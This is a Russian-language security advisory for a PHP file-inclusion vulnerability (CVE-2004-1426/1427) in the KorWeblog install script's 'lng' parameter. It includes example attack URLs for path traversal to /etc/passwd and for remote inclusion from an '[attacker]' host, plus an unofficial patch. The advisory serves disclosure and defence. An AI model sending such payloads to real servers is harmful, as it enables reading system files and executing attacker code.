php инклюдинг в KorWeblog

Дата публикации:
03.01.2005
Всего просмотров:
1574
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-1426
CVE-2004-1427
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
KorWeblog 1.x
Уязвимые версии: KorWeblog 1.6.2-cvs и более ранние версии

Описание:
Обнаружена уязвимость в KorWeblog. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость обнаружена в сценарии '/install/index.php' из-за некорректной фильтрации входных данных в параметре 'lng'. Удаленный атакующий может создать специально сформированный URL и выполнить произвольный php сценарий на уязвимой системе с привилегиями web сервера. Примеры:

http://[target]/weblog/install/index.php?lng=../../../../../../etc/passwd%00

http://[target]/weblog/install /index.php?lng=../../phpinfo

http://[target]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker]

URL производителя: http://weblog.kldp.org

Решение: Решение не существует на данный момент.
Неофициальный патч:

--- index_1_6_1.php Mon Dec 27 17:31:50 2004
+++ index.php Mon Dec 27 17:40:51 2004
@@ -18,7 +18,10 @@

$G_VER = "1.6.1";

-if (!empty($lng)) include("lang/$lng" . ".php");
+if (!empty($lng)) {
+ if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";
+ include("lang/$lng" . ".php");
+}

$sql_form ="<P>
< TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>

Ссылки: KorWeblog php injection Vulnerability

или введите имя

CAPTCHA